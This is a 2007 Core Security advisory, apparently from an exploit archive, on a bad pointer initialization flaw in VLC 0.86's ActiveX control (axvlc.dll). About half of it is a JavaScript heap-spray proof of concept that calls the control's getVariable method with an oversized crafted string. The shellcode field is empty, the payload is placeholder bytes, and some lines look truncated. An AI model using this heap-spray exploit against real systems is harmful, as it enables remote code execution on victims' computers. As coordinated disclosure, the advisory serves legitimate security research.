VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization







       Core Security Technologiess - CoreLabs Advisory

    VLC Activex Bad Pointer Initialization Vulnerability

*Advisory Information*
Title: VLC Activex Bad Pointer Initialization Vulnerability
Advisory ID: CORE-2007-1004
Advisory URL:
Date published: 2007-12-04
Date of last update: 2007-12-03
Vendors contacted: VLC
Release mode: Coordinated Release

*Vulnerability Description*
VLC player is a popular multimedia player for various audio and video
formats, and various streaming protocols.

A vulnerability has been found in the ActiveX control DLL (axvlc.dll)
used by VLC player. This library contains three methods whose parameters
are not correctly checked, and may produce a bad initialized pointer. By
providing these functions specially crafted parameters, an attacker can
overwrite memory zones and execute arbitrary code.

*Vulnerable packages*
VLC media player version 0.86, 0.86a, 0.86b y 0.86c.

<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8'
id='target' ></object>
      var mm  = null;

      if( target != null )
         var param1 = unescape("%u0505%u0505");
         var salame = "defaultV";
         var salame2 = 1;
         var salame3 = 0;

         ag   = unescape("%uCCCC%uCCCC");
         sh   =
         sz   = sh.length * 2;
         npsz = 0x400000 - (sz + 0x38);
         nps  = unescape("%u0505%u0505");

         while(nps.length * 2 < npsz) nps += nps;
         ihbc = (0x0E000000 - 0x400000) / 0x400000;
         mm   = new Array();

         for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;

         for(var i=0;i<2000;i++)
            param1 = param1 + unescape("%u0505%u0505");
         target.getVariable (param1);

# [2007-12-04]